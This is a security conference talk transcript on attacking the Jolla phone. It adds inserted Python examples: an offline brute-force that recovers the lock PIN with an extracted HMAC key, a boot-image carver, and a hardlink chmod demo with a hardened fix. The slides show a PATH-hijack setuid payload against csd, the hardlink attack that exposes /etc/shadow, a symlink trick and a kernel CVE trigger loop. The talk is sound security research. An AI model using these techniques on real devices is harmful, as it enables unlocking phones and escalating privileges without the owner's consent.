
"Hacking the Jolla" - Circle City Con 2015

Co-Presented with Vitaly McLain (https://twitter.com/send9)

Drew Suarez (utkanos)

June 14, 2015

Transcript

  1. Hacking the Jolla
    Vitaly McLain (@send9)
    Drew Suarez (@utkan0s)


  2. Why this talk?
    • Explore an interesting phone
    • Show different attack surfaces a phone can have
    • Commonalities with mobile, Linux, ARM, etc.
    • Good intro to mobile phone / embedded device / Linux
    hacking in general

  3. Jolla: A History
    • Nokia developed Maemo
    • Then they merged it with Intel’s Moblin
    • This became MeeGo
    • …and then they got rid of all Linux phones
    • Engineers + Nokia “Bridge” fund == Jolla Oy

  4. From MeeGo to Sailfish OS
    • Funding but no intellectual property
    • Mer == open-source MeeGo fork
    • Combine open-source: Mer + Wayland + Qt5/QML
    • And proprietary: Silica (complement to QtQuick), Lipstick
    (shell on top of Wayland)
    • Change .deb -> openSUSE RPM, apt -> zypper, upstart ->
    systemd
    • We get Sailfish OS!

  5. The Other Half
    • Really neat “smart covers” called Other Half
    • Ambience / theme based on cover
    • Keyboard, other peripherals, etc.
    • Uses NFC and I2C to communicate with device
    • Check out our EkoParty 2014 presentation for research performed by
    Chris Weedon

  7. Attack Surface: Boot Process
    • Before we get to the OS, a phone has to boot
    • How can we explore the boot loader and different boot
    modes? How can we attack it?

  8. What are we after?
    • Understanding the image type
    • Device topologies
    • Ramdisk contents


  9. Topology
    • ‘mount’ and /proc/partitions
    • /dev/block/platform/[soc]/by-name
    • ramdisk contents


  10. lrwxrwxrwx 1 root root 22 2014-10-18 23:40 aboot -> ../../../../mmcblk0p17
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 boot -> ../../../../mmcblk0p20
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 drm -> ../../../../mmcblk0p19
    lrwxrwxrwx 1 root root 21 2014-10-18 23:40 emgdload -> ../../../../mmcblk0p1
    lrwxrwxrwx 1 root root 21 2014-10-18 23:40 fsg -> ../../../../mmcblk0p8
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 misc -> ../../../../mmcblk0p23
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 modem -> ../../../../mmcblk0p18
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 modemst1 -> ../../../../mmcblk0p10
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 modemst2 -> ../../../../mmcblk0p11
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 pad1 -> ../../../../mmcblk0p22
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 persist -> ../../../../mmcblk0p25
    lrwxrwxrwx 1 root root 21 2014-10-18 23:45 Qcfg -> ../../../../mmcblk0p4
    lrwxrwxrwx 1 root root 21 2014-10-18 23:40 Qdlog -> ../../../../mmcblk0p5
    lrwxrwxrwx 1 root root 21 2014-10-18 23:40 Qfa -> ../../../../mmcblk0p3
    lrwxrwxrwx 1 root root 21 2014-10-18 23:40 Qglog -> ../../../../mmcblk0p9
    lrwxrwxrwx 1 root root 21 2014-10-18 23:40 Qlogfilter -> ../../../../mmcblk0p7
    lrwxrwxrwx 1 root root 21 2014-10-18 23:40 QOTP -> ../../../../mmcblk0p2
    lrwxrwxrwx 1 root root 21 2014-10-18 23:40 Qvariables -> ../../../../mmcblk0p6
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 recovery -> ../../../../mmcblk0p21
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 rpm -> ../../../../mmcblk0p16
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 sailfish -> ../../../../mmcblk0p28
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 sbl1 -> ../../../../mmcblk0p12
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 sbl2 -> ../../../../mmcblk0p13
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 sbl3 -> ../../../../mmcblk0p14
    lrwxrwxrwx 1 root root 22 2014-10-18 23:54 security -> ../../../../mmcblk0p27
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 ssd -> ../../../../mmcblk0p26
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 swap -> ../../../../mmcblk0p24
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 tz -> ../../../../mmcblk0p15


  11. 179 0 15267840 mmcblk0
    179 1 4079 mmcblk0p1 emgdload
    179 2 32768 mmcblk0p2 QOTP
    179 3 4096 mmcblk0p3 Qfa
    179 4 4096 mmcblk0p4 Qcfg
    179 5 4096 mmcblk0p5 Qdlog
    179 6 2048 mmcblk0p6 Qvariables
    179 7 2048 mmcblk0p7 Qlogfilter
    179 8 4096 mmcblk0p8 fsg
    179 9 49152 mmcblk0p9 "SYSLOG"
    179 10 4096 mmcblk0p10 modemst1
    179 11 4096 mmcblk0p11 modemst2
    179 12 2048 mmcblk0p12 SBL1
    179 13 2048 mmcblk0p13 SBL2
    179 14 2048 mmcblk0p14 SBL3
    179 15 2048 mmcblk0p15 trustzone
    179 16 2048 mmcblk0p16 rpm
    179 17 2048 mmcblk0p17 aboot
    179 18 65536 mmcblk0p18 "FIRMWARE"
    179 19 8192 mmcblk0p19 "DRM"
    179 20 12288 mmcblk0p20 12MB (GOOD TARGET FOR K/R) KERNEL
    179 21 12288 mmcblk0p21 12MB (GOOD TARGET FOR K/R) RECOVERY
    179 22 8192 mmcblk0p22 pad1
    179 23 8192 mmcblk0p23 misc
    179 24 520184 mmcblk0p24 "SWAP"
    179 25 8192 mmcblk0p25 "PERSIST"
    179 26 8 mmcblk0p26 ssd
    179 27 8192 mmcblk0p27 "SECURITY"
    179 28 14415855 mmcblk0p28 "HOME /"


  12. Extracting images for investigation
    • Grab partitions with dd command
    $ dd if=/dev/block/mmcblk0p21 of=~/blkp21.img
    • Tools can help to explore / extract parts of images

  13. utkanos@leviathan ~/jolla $ od -c mmcblk0p21.img | more
    0000000 A N D R O I D ! 0 H ] \0 \0 200 200
    0000020 257 022 6 \0 \0 \0 202 \0 \0 \0 \0 \0 \0 020 201
    0000040 \0 001 200 \0 \b \0 \0 \0 \0 \0 \0 \0 \0 \0 \0
    0000060 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0
    0000100 i n i t = / s b i n / p r e i n
    0000120 i t r o o t = / d e v / m m c
    0000140 b l k 0 p 2 8 r o o t f s t y
    0000160 p e = b t r f s r o o t f l a
    0000200 g s = r e c o v e r y n o i n
    0000220 i t r d a n d r o i d b o o t
    0000240 . h a r d w a r e = q c o m u
    0000260 s e r _ d e b u g = 3 1 e h c
    0000300 i - h c d . p a r k = 3 m a x
    0000320 c p u s = 2 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0
    0000340 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0


  14. binwalk


  15. mkboot


  16. Jolla’s Boot/Recovery
    • Structure
    • Inspecting the Firmware
    • Lock/Unlock


  17. Structure
    • Android style images for recovery
    • Android boot header
    • zImage and rootfs.cpio
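Added example (mine, not the authors' or mkboot's code): the fields od(1) showed above live in a fixed 608-byte Android boot header, and the kernel and ramdisk follow it page-aligned, so carving a dd'd boot or recovery partition into zImage and rootfs.cpio needs nothing beyond struct. The sample image, its load addresses and the stub cpio are constructed here; the command line is the one from the dump. The format sniffer tells you which decompressor the ramdisk needs before you reach for binwalk.

```python
import gzip
import lzma
import struct

BOOT_MAGIC = b"ANDROID!"
# Android boot image header, version 0 (the layout lk and abootimg-era tools use):
#   magic[8], kernel_size, kernel_addr, ramdisk_size, ramdisk_addr, second_size,
#   second_addr, tags_addr, page_size, unused[8], name[16], cmdline[512], id[32]
# Integers are little-endian u32; the header sits alone in page 0, cmdline at 0x40.
HEADER_FMT = "<8s8I8s16s512s32s"
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 608 bytes

# Kernel command line as seen in the od(1) dump of mmcblk0p21 above.
JOLLA_CMDLINE = (b"init=/sbin/preinit root=/dev/mmcblk0p28 rootfstype=btrfs "
                 b"rootflags=recovery noinitrd androidboot.hardware=qcom "
                 b"user_debug=31 ehci-hcd.park=3 maxcpus=2")


def page_align(n, page):
    return (n + page - 1) // page * page


def parse_boot_header(data):
    """Decode the header; ValueError on bad magic or a short read."""
    if len(data) < HEADER_LEN or data[:8] != BOOT_MAGIC:
        raise ValueError("not an Android boot image (no ANDROID! magic)")
    f = struct.unpack_from(HEADER_FMT, data, 0)
    return {
        "kernel_size": f[1], "kernel_addr": f[2],
        "ramdisk_size": f[3], "ramdisk_addr": f[4],
        "second_size": f[5], "second_addr": f[6],
        "tags_addr": f[7], "page_size": f[8],
        "name": f[10].rstrip(b"\0").decode("ascii", "replace"),
        "cmdline": f[11].rstrip(b"\0").decode("ascii", "replace"),
        "id": f[12].hex(),
    }


def carve(data):
    """Return (header, kernel_bytes, ramdisk_bytes); every section is page-aligned."""
    hdr = parse_boot_header(data)
    page = hdr["page_size"]
    if page == 0 or page & (page - 1):
        raise ValueError("implausible page_size %d" % page)
    k_off = page                                          # header occupies page 0
    r_off = k_off + page_align(hdr["kernel_size"], page)
    end = r_off + page_align(hdr["ramdisk_size"], page)
    if end > len(data):
        raise ValueError("truncated: header claims %d bytes, have %d" % (end, len(data)))
    return (hdr, data[k_off:k_off + hdr["kernel_size"]],
            data[r_off:r_off + hdr["ramdisk_size"]])


def ramdisk_format(blob):
    """Sniff what wraps rootfs.cpio so you know which decompressor to run."""
    if blob[:2] == b"\x1f\x8b":
        return "gzip"
    if blob[:6] == b"\xfd7zXZ\x00":
        return "xz"
    if blob[:4] == b"\x89LZO":
        return "lzo"
    if blob[:4] == b"\x04\x22\x4d\x18":
        return "lz4"
    if blob[:6] in (b"070701", b"070702", b"070707"):
        return "cpio"                                     # already a bare newc/odc archive
    return "unknown"


def unwrap_ramdisk(blob):
    """Decompress the wrappers the stdlib handles; lzo/lz4 need external tools."""
    fmt = ramdisk_format(blob)
    if fmt == "gzip":
        return gzip.decompress(blob)
    if fmt == "xz":
        return lzma.decompress(blob)
    if fmt == "cpio":
        return blob
    raise NotImplementedError("unpack %s ramdisk with an external tool" % fmt)


def build_boot_image(kernel, ramdisk, cmdline=JOLLA_CMDLINE, page_size=2048):
    """Assemble a minimal boot.img (constructed test input; load addresses are made up)."""
    hdr = struct.pack(HEADER_FMT, BOOT_MAGIC,
                      len(kernel), 0x80208000, len(ramdisk), 0x82200000,
                      0, 0, 0x80200100, page_size,
                      b"\0" * 8, b"", cmdline, b"\0" * 32)
    pad = lambda b: b + b"\0" * (page_align(len(b), page_size) - len(b))
    return pad(hdr) + pad(kernel) + pad(ramdisk)


def sample_image():
    """Constructed input: 4000 bytes of ARM NOPs as 'kernel', a gzip'd stub cpio as ramdisk."""
    kernel = b"\x00\x00\xa0\xe1" * 1000                   # mov r0, r0, little-endian
    cpio = b"070701" + b"0" * 104 + b"TRAILER!!!\0"       # newc magic + padding + trailer
    return build_boot_image(kernel, gzip.compress(cpio)), kernel, cpio


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as fh:                   # e.g. the dd'd mmcblk0p21.img
        hdr, kernel, ramdisk = carve(fh.read())
    print(hdr, len(kernel), len(ramdisk), ramdisk_format(ramdisk))
    open("zImage", "wb").write(kernel)
    open("rootfs.cpio." + ramdisk_format(ramdisk), "wb").write(ramdisk)
```

Run it against the dd output and the cmdline you get back should match the od dump; if `ramdisk_format` says `cpio` the image was built with an uncompressed rootfs and `cpio -idv` on it directly.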


  18. Image signing?
    • lk is patched in 1.1.0.38 (Uitukka)
    • New LK attacks out there
    • Fixes the RSA cube-root attack on the signature (Bleichenbacher-style low-exponent forgery)
    • Currently images are not signed…

  19. Recovery / fastboot mode
    • Access recovery with vol down + power at boot (no usb)
    • telnet based connection
    • menu system of shell scripts
    • Access fastboot with vol down + power at boot (w usb)
    • needs the USB vendor ID 0x2931 (fastboot -i 0x2931)
    • not all args supported, locked by default


  21. Recovery Menu
    • Recovery menu driven by shell scripts
    • Contains option to lock/unlock boot loader,
    get root shell
    • Can be protected by setting PIN code on
    phone (in Sailfish UI)

  22. Quirks
    • 5 attempts at pin code, then throttled
    • After 5 wrong pins, a file is written to
    ramdisk
    • Docs say reset is after 24 hours…
    • … a reboot clears it (not surprising)


  23. How are these modes protected?
    • Security code can be set in userland via system settings
    • Discovered restore-lock binary in recovery ramdisk
    • mmcblk0p27 (security partition)
    • header shows lock/unlock status
    • possible hash?
    • partition 6 changes based on lock status
    • partition 2 had an interesting string as well


  24. mmcblk0p27 (locked, unlocked)


  25. mmcblk0p6 (after bootloader unlock)
    [root@Jolla nemo]# od -c p6_postblunlock.img
    0000000 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0
    *
    0010240 \0 \0 \0 \0 d f s c k \0 \0 \0 \0 \0 \0 \0
    0010260 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0
    *
    0010660 \0 \0 \0 \0 \0 \0 \0 377 377 377 377 377 \0 \0 \0 \0
    0010700 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0
    *
    0047500 \0 \0 \0 \0 \0 K 1 2 C o L N u O e M
    0047520 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0
    *
    10000000


  26. mmcblk0p2
    utkanos@leviathan ~$ od -c mmcblk0p2.img
    0000000 X I 002 026 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0
    0000020 3 5 9 7 4 5 0 5 0 0 8 3 1 5 0 \0
    0000040 300 230 d 9 261 253 277 M ? 036 230 D 037 y 241 031
    0000060 5 0 5 6 A 8 0 0 1 F 5 5 \0 \0 \0 \0
    0000100 5 0 5 6 A 8 0 1 1 F 5 5 \0 \0 \0 \0
    0000120 235 224 p 315 K } 377 \ + & 231 177 036 224 350 n
    0000140 264 311 205 @ \n \f 327 V 373 K 210 ~ < ' 265 020
    0000160 337 \t , ~ 017 370 022 251 \ 321 251 I 217 } 364 223
    0000200 201 * \n 314 036 \ 373 % 244 252 361 303 270 7 211 w
    0000220 234 W 027 226 c m 8 m p Y 205 265 \v 367 y \v
    0000240 006 337 300 332 037 Y B 323 350 367 233 277 R ? 017 253
    0000260 301 J 332 240 021 353 253 # 360 233 306 350 V 245 255 w
    0000300 001 244 Z 325 F 335 257 202 362 # 326 ^ 346 g 221 !
    0000320 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0
    *
    200000000
    Other images involved in device lock…


  27. Thoughts
    • If you have a Jolla, enable device lock and
    developer mode!
    • not an ideal security model
    • at least some protection
    • Interesting mix of different software may
    expose additional issues later on


  28. Let’s put it together…
    • What are some of the values we saw used
    for?
    • How does the phone store the lock PIN?
    • Can we recover it?

  29. Let’s put it together…
    • We saw a 160-bit hash value earlier. Sounds
    like SHA-1.

    • We saw the restore-lock binary which
    performs the actions we’re interested in.

    • Why don’t we look at how it checks the PIN
    code…

  32. What is it doing?
    • Disassembly shows it using…
    • Something from mmcblk0p2
    • A static string
    • Another value from mmcblk0p2
    • A static string
    • Calling into OpenSSL for EVP_sha1() and the
    HMAC() function
    • The concatenated string is the key for
    HMAC-SHA1

  33. Extracting the key
    • restore-lock comes from recovery, but
    it’s a regular ARM ELF binary
    • Should be able to read partitions in the OS
    too
    • Can use tools right in Sailfish instead of
    instrumenting recovery


  34.
    [root@Jolla nemo]# ./restore-lock --check-code 1233
    [root@Jolla nemo]# echo $?
    1
    [root@Jolla nemo]# ./restore-lock --check-code 31337
    [root@Jolla nemo]# echo $?
    0
    Yep, works fine!


  35. Getting the key
    • Run restore-lock in gdb within Sailfish
    • Set breakpoint on HMAC function
    • Grab the key when breakpoint hits

  36. HMAC gets the key
    According to https://www.openssl.org/docs/crypto/hmac.html, this is the function prototype…
    unsigned char *HMAC(const EVP_MD *evp_md, const void *key,
    int key_len, const unsigned char *d, int n,
    unsigned char *md, unsigned int *md_len);

  37. Extract the key and test it
    • Knowing the ARM calling convention (AAPCS: first four
    arguments in R0-R3), that second argument should be in register R1
    • Sure enough…
    Breakpoint 1, 0x400dec14 in HMAC () from /lib/libcrypto.so.10
    (gdb) x/s $r1
    0xbefff734: "359745050083150010101011115A05AF0161101101000111"

  39. It works!
    • We know the key, we know two parts are static,
    we’ll figure out more in a bit
    • Having the hash and the HMAC key, how do we recover the
    plaintext PIN?
    • hashcat does a great job at HMAC-SHA1…
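Added example (mine, not the authors' code) of the "put it together" step done offline: once the key from R1 and the 20-byte tag from the security partition are on your disk, the five-attempt throttle in recovery no longer applies. The tag used here is constructed from the PIN 31337 that returned 0 on slide 34 (the real tag lives in the mmcblk0p27 image, which is not reproduced on the page). The deck states that the concatenated string is the HMAC key; that the PIN digits are the HMAC message is my assumption. The hashcat line is for mode 160 (HMAC-SHA1, key = $salt).

```python
import hashlib
import hmac
import itertools

# The 48-byte key read out of R1 at the HMAC() breakpoint on slide 37. It is a
# concatenation of two values from mmcblk0p2 and two static strings; the slides
# do not give the boundaries, so it is used whole.
HMAC_KEY = b"359745050083150010101011115A05AF0161101101000111"


def pin_tag(key, pin):
    """HMAC-SHA1 over the PIN. Assumption (mine): the ASCII PIN digits are the
    message; the deck only states that the concatenated string is the key."""
    return hmac.new(key, pin.encode("ascii"), hashlib.sha1).digest()


def check_code(stored_hex, key, pin):
    """Same contract as 'restore-lock --check-code': exit status 0 on match, 1 otherwise."""
    ok = hmac.compare_digest(pin_tag(key, pin), bytes.fromhex(stored_hex))
    return 0 if ok else 1


def recover_pin(stored_hex, key, min_digits=4, max_digits=6):
    """Offline brute force over numeric PINs, shortest first. Returns the PIN or None."""
    target = bytes.fromhex(stored_hex)
    for n in range(min_digits, max_digits + 1):
        for digits in itertools.product("0123456789", repeat=n):
            pin = "".join(digits)
            if hmac.new(key, pin.encode("ascii"), hashlib.sha1).digest() == target:
                return pin
    return None


def hashcat_line(stored_hex, key):
    """hashcat -m 160 (HMAC-SHA1, key = $salt) takes one 'digest:salt' per line,
    so the device string goes in the salt slot and the PIN is the candidate."""
    return "%s:%s" % (stored_hex, key.decode("ascii"))


if __name__ == "__main__":
    tag = pin_tag(HMAC_KEY, "31337").hex()             # constructed stand-in for the p27 value
    print("hashcat -m 160 line:", hashcat_line(tag, HMAC_KEY))
    print("recovered:", recover_pin(tag, HMAC_KEY))
```

A 6-digit space is a million HMAC-SHA1 calls, a few seconds in pure Python and negligible for hashcat; the only thing protecting the PIN once the partitions are readable is its length.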

  40. Attack Surface: Operating System
    • Early versions of mobile operating systems
    often have bugs from the 90s
    • Linux / userland bugs will affect this
    environment too
    • Focus: map out Sailfish/Jolla/MeeGo-specific
    attack surface

  41. Operating System
    • Many interesting binaries on the device
    • A lot of test binaries and applications left intact
    • Not sure if this is a result of enabling developer mode or if this is stock
    • Ex: qseecomd_security_test, oemwvtest, StoreKeybox
    • Attack surface is potentially huge, but gets small quickly.
    • Virtually no listening services other than DHCP, so the remote attack
    surface is small from a network perspective.
    • Leaves plenty of room for vulnerable applications

  42. Operating System
    • You say you want security? Sandboxing, ASLR, RELRO, PIE, NX, etc.?
    • Nope… not here. Well, some of it is (see next page)
    • As of now, the system relies heavily on *nix user/FS permissions
    • Which isn’t bad… it’s just not great
    • There are plans to implement these things in the future though…

  43. Operating System
    • No kernel heap hardening
    • No grsec/PaX
    • No user-copy checks
    • No enforcement of read-only

  44. Operating System
    • CPU NX bit support? -- Nope

  45. Operating System
    • Stack canaries? RELRO? PIE?
    • Some but not all

  46. Application Layer
    • Stock applications
    • Most applications are written in C/C++
    • Although there are lots of shell scripts on the device
    • Mix of ELF32 armv7hl binaries and QML “applications”; I’m using
    application here very loosely
    • Often, the binaries have Qt API calls embedded in them that leverage
    the QML “applications”.
    • Picture the binary as the service, and the QML as the GUI
    • What is QML?
    • Qt Meta Language or Qt Modeling Language
    • It’s like JavaScript, OpenSCAD, Python, and LaTeX all rolled into one
    • Used to describe what something will look like, and the action that thing will
    perform

  47. QML
    • What is QML? (2)

  48. The Userland
    • All regular apps run as “nemo”
    • That’s how you access the phone, too
    • Use SSH via USB or network in dev mode

  49. Attack Surface: Userland
    • Some binaries run as root via invoker
    • And there are some traditional suids/sgids

    $ find / -type f \( -perm -u+s -o -perm -g+s \) 2>/dev/null

    • Interesting: owned by root or gid == privileged
    • Not common to other Linux distros (Sailfish/Mer/Maemo binaries?)

  50. A few interesting binaries…
    • /usr/bin/simkit [sgid privileged] – Newer. Research ongoing
    • /usr/bin/csd [suid root / sgid disk] – Diagnostic utility (can also
    be triggered via *#*#310#*#* on the dialer). Neat by itself.
    • /usr/libexec/mapplauncherd/booster-silica-qt5 [suid root] –
    Used to support Silica extensions, uses mapplauncherd
    • /usr/bin/devel-su [suid root] – Custom su. Written in C! No
    stack canaries or PIE

  51. But what to do?
    • readelf, objdump, gdb, gdbserver available or install via
    pkcon
    • Memory corruption would be nice
    • Fuzz input
    • Fuzz environment variables
    • Get more intelligent ☺
    • But it’s also very dangerous for suids to shell out
    • We should look for system() and popen(), right?

  52. Oh wait, C++ and Qt
    [nemo@Jolla ~]$ ls -al /usr/bin/csd
    -rwsr-sr-x 1 root disk 140572 2014-05-21 13:52 /usr/bin/csd
    [nemo@Jolla ~]$ readelf -a /usr/bin/csd | grep system
    [nemo@Jolla ~]$ readelf -a /usr/bin/csd | grep popen
    [nemo@Jolla ~]$ readelf -a /usr/bin/csd | grep QProcess
     99: 00000000     0 FUNC    GLOBAL DEFAULT  UND _ZN8QProcess15waitForFini
    113: 00000000     0 FUNC    GLOBAL DEFAULT  UND _ZN8QProcess21readAllStan
    143: 00000000     0 FUNC    GLOBAL DEFAULT  UND _ZN8QProcessC1EP7QObject
    149: 00000000     0 FUNC    GLOBAL DEFAULT  UND _ZN8QProcess5startERK7QSt
    166: 00000000     0 FUNC    GLOBAL DEFAULT  UND _ZN8QProcess7executeERK7Q
    170: 00000000     0 FUNC    GLOBAL DEFAULT  UND _ZN8QProcessD1Ev
    235: 00000000     0 FUNC    GLOBAL DEFAULT  UND _ZN8QProcess5startERK7QSt

  55. Tried to have this executed…
    #include <stdio.h>
    #include <sys/types.h>
    #include <unistd.h>

    /* Dropped into a directory placed first on PATH, so that whatever csd's
       QProcess calls spawn by bare name resolves to this instead. If the
       privileges survive, "flag" records euid 0 and the chmod/setgid to
       gid 6 (disk) succeeds. */
    int main(int argc, char **argv) {
      setuid(0);
      setgid(6);
      FILE *f = fopen("flag", "w");
      if (f == NULL)
        return 1;
      fprintf(f, "UID, EUID: %d, %d\n", getuid(), geteuid());
      fclose(f);
      return 0;
    }

  56. Looked promising…
    $ env PATH=.:$PATH /usr/bin/csd
    [D] QWaylandEglIntegration::QWaylandEglIntegration:58 - Using Wayland-EGL  
    [W] QQmlImportDatabase::importPlugin:1697 - Module 'Sailfish.Silica' does not
    contain a module identifier directive - it cannot be protected from external
    registrations.  
    [D] FactoryUtils::getFlags:94 - FILE said: "4436"  
    [D] FactoryUtils::isVerified:123 - Head = "4436"  
    [D] FactoryUtils::writeCsdResults:55 - writeCsdResults:
    "0000000000000000000000000000000000000000000000000000000000000000000000000000000000
    0000000000"  
    DeclarativeCoverWindow: I have a default alpha buffer  
    [D] FactoryUtils::writeCsdResults:55 - writeCsdResults:
    "0000000000000000000000000000000000000000000000000000000000000000000000000000000000
    0000000000"  
    Clicked 28  
    [D] SdCardTest::getSdCardPath:49 - sdpath = "/run/user//media/sdcard"


  57. Nope ☹
    • Content of “flag”: UID, EUID: 100000, 100000 (nemo)
    • Drops privs
    • Probably bash priv mode?

  58. Turns out…
    • Only doesn’t drop privs for a few functions
    • chmod()’s a few things in /sys
    • Not much you can do other than disable a charger…

  61. Basic fuzzing: no-go either
    • Dumb fuzzing:
    • Common strings (various sizes of “A”, format
    strings, etc.) for input
    • Same for env variables
    • Got some SIGABRTs but no crashes

  62. Other low-hanging fruit
    • Init scripts are a common place to look for vulns across
    mobile platforms
    • grep’ing /init* for chown and chmod are good starting
    points
    • Can we get it to chmod, chown or do something else to
    a file in a location we can write to?
    • Can we symlink? Or: hardlink. Sailfish didn’t follow
    symlinks but does follow hardlinks, not sure why…

  63. One fun example (fixed in next release)
    [nemo@Jolla vuln]$ ls -al /etc/shadow
    ---------- 1 root root 1772 2015-03-04 00:17 /etc/shadow
    [nemo@Jolla vuln]$ ln /etc/shadow vuln.log
    [nemo@Jolla vuln]$ ls -al
    total 4
    drwxrwxr-x 1 nemo nemo 24 2015-03-29 22:44 .
    drwxrwx--x 1 system system 178 2015-03-04 00:06 ..
    ---------- 2 root root 1772 2015-03-04 00:17 vuln.log
    [nemo@Jolla vuln]$
    [nemo@Jolla vuln]$ ls -al /etc/shadow
    -rw-rw-rw- 2 root root 1772 2015-03-04 00:17 /etc/shadow
    [nemo@Jolla vuln]$ head /etc/shadow
    root:!*:16010:0:99999:7:::
    bin:*:16010:0:99999:7:::
    daemon:*:16010:0:99999:7:::
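The hardlink trick above, replayed in a scratch directory as an added example (mine, not the deck's), next to the check a privileged helper should make before it chmod()s a path under a user-writable directory. On mainline kernels since 3.6 the ability to hardlink a file you cannot write is governed by the fs.protected_hardlinks sysctl; the deck does not say whether the Jolla 3.4 kernel carries a backport, so the example only reports the knob if it exists. The file names and the 0o600 mode are constructed, and the demo links a file it owns, which every kernel setting allows, so it runs unprivileged.

```python
import os
import shutil
import stat
import tempfile


def protected_hardlinks():
    """fs.protected_hardlinks (Linux >= 3.6); None where the knob does not exist."""
    try:
        with open("/proc/sys/fs/protected_hardlinks") as fh:
            return int(fh.read().strip())
    except (OSError, ValueError):
        return None


def fix_perms_vulnerable(path, mode=0o666):
    """What the init-script bug on the slide amounts to: a privileged helper
    chmod()s whatever inode a user-influenced path resolves to."""
    os.chmod(path, mode)


def fix_perms_hardened(path, expected_uid, mode=0o666):
    """Refuse to touch an inode that is not ours alone: open without following
    symlinks, check type, owner and link count on the fd we actually got, then
    fchmod() that same fd (no second path lookup, so no TOCTOU window)."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_CLOEXEC)
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError("%s: not a regular file" % path)
        if st.st_uid != expected_uid:
            raise PermissionError("%s: owned by uid %d, expected %d"
                                  % (path, st.st_uid, expected_uid))
        if st.st_nlink != 1:
            raise PermissionError("%s: %d links to this inode, hardlink attack?"
                                  % (path, st.st_nlink))
        os.fchmod(fd, mode)
    finally:
        os.close(fd)


def demo():
    """Replay the attack in a temp dir and report what each helper did to the target."""
    top = tempfile.mkdtemp(prefix="jolla-hardlink-")
    try:
        shadow = os.path.join(top, "shadow")            # stands in for /etc/shadow
        with open(shadow, "w") as fh:
            fh.write("root:!*:16010:0:99999:7:::\n")    # line from the slide
        os.chmod(shadow, 0o600)                         # owner-only, like the real one
        vuln_dir = os.path.join(top, "vuln")            # stands in for nemo's writable dir
        os.mkdir(vuln_dir)
        link = os.path.join(vuln_dir, "vuln.log")
        os.link(shadow, link)                           # 'ln /etc/shadow vuln.log'

        out = {"protected_hardlinks": protected_hardlinks(),
               "nlink": os.stat(shadow).st_nlink}       # 2: both names share the inode

        fix_perms_vulnerable(link)                      # privileged chmod via the alias
        out["mode_after_vulnerable"] = stat.S_IMODE(os.stat(shadow).st_mode)

        os.chmod(shadow, 0o600)                         # reset, retry with the hardened helper
        try:
            fix_perms_hardened(link, os.getuid())
            out["hardened_refused"] = False
        except PermissionError:
            out["hardened_refused"] = True
        out["mode_after_hardened"] = stat.S_IMODE(os.stat(shadow).st_mode)
        return out
    finally:
        shutil.rmtree(top)


if __name__ == "__main__":
    print(demo())
```

The link-count check is the one that matters for hardlinks: a symlink never reaches the inode because of O_NOFOLLOW, but a hardlink is the inode, so the only tell is st_nlink > 1 (and, for a root-owned target, the owner mismatch).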


  64. Another oddity (already fixed!)
    [nemo@Jolla tmp]$ ln -s /etc/anyfile udhcpd.conf
    [nemo@Jolla tmp]$ ls -al udhcpd.conf
    lrwxrwxrwx 1 nemo nemo 12 2015-03-29 22:34 udhcpd.conf -> /etc/anyfile
    [nemo@Jolla tmp]$ ls -al /etc/anyfile
    ls: cannot access /etc/anyfile: No such file or directory
    Now, plug computer USB cable into phone, or somehow simulate this action.
    [nemo@Jolla tmp]$ ls -al /etc/anyfile
    -rw-r--r-- 1 root root 80 2015-03-29 22:35 /etc/anyfile
    [nemo@Jolla tmp]$ cat /etc/anyfile
    start 192.168.2.1
    end 192.168.2.10
    interface rndis0
    option subnet 255.255.255.0
    [nemo@Jolla tmp]$ whoami
    nemo
    [nemo@Jolla tmp]$ id
    uid=100000(nemo) gid=100000(nemo) groups=39(video),100(users),995(ssu),996(timed),999(oneshot),1000(system),
    1002(bluetooth),1003(graphics),1004(input),1005(audio),1006(camera),1024(mtp),100000(nemo)


  65. Shellshock
    • It was vulnerable
    • Couldn’t find anything to use it on: nothing suid loaded
    env vars, dhclient not in use
    • Maybe missed opportunity with some binaries that run
    from invoker. Or CSD.
    • Patched in latest hotfix

  66. What about the kernel?
    # lsmod
    Module Size Used by  
    wlan 2592646 0  
    cfg80211 144905 1 wlan
    # uname -a  
    Linux Jolla 3.4.91.20140612.1 #1 SMP PREEMPT Mon Jun 16 17:24:16 UTC 2014 armv7l
    armv7l armv7l GNU/Linux


  67. Patched for most modern CVEs
    $ for ((i = 39; i <= 150; i++)); do ./trigger_sock_diag $i; done
    Sending with family 39
    Sending with family 40
    Sending with family 41
    Sending with family 42
    Sending with family 43
    Sending with family 44
    Sending with family 45
    Sending with family 46
    …..
    • The loop walks the netlink sock_diag family index past AF_MAX, the
    CVE-2013-1763 out-of-bounds; the kernel surviving the whole range is
    what “patched” means here

  68. Normal functionality gone bad
